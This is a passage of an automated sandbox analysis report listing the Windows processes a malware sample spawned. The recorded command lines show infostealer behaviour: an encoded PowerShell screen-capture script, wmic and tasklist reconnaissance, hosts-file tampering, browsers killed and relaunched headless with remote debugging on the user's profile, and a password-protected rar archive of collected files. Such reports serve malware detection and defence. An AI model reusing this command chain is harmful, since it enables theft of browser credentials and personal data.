sAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff6416e0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	23:57:16
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff7bd2b0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff7bd2b0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7668, Parent PID: 7764

General

Target ID:	48
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline"
Imagebase:	0x7ff614620000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	23:57:17
Start date:	20/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff62a660000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	23:57:18
Start date:	20/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6698.tmp" "c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP"
Imagebase:	0x7ff6c6590000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	23:57:18
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	23:57:18
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	23:57:18
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	23:57:18
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	23:57:18
Start date:	20/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff63bdc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	23:57:18
Start date:	20/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM chrome.exe
Imagebase:	0x7ff63bdc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	23:57:19
Start date:	20/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=1111 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\google\chrome\User Data" --profile-directory=Default https://www.google.com
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	23:57:19
Start date:	20/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=2223 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local/Microsoft/Edge/User Data" https://www.google.com
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	23:57:20
Start date:	20/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	61
Start time:	23:57:20
Start date:	20/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2424 --field-trial-handle=1428,i,10138126548580973783,13072940522587371912,262144 --disable-features=PaintHolding /prefetch:3
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	23:57:20
Start date:	20/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2384 --field-trial-handle=1596,i,5917360806848576916,10320061818208395364,262144 --disable-features=PaintHolding /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	23:57:23
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	23:57:23
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7648, Parent PID: 8112

General

Target ID:	66
Start time:	23:57:23
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	23:57:23
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4460, Parent PID: 7568

General

Target ID:	68
Start time:	23:57:23
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	23:57:23
Start date:	20/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM msedge.exe
Imagebase:	0x7ff63bdc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	23:57:23
Start date:	20/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM chrome.exe
Imagebase:	0x7ff63bdc0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	23:57:28
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	23:57:28
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	23:57:28
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe a -r -hp"1" "C:\Users\user\AppData\Local\Temp\WE9Ml.zip" *
Imagebase:	0x7ff77d1f0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	23:57:29
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	23:57:30
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	23:57:30
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff6d7c90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	23:57:30
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff650cc0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	23:57:30
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	23:57:30
Start date:	20/12/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff6d7c90000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	23:57:32
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
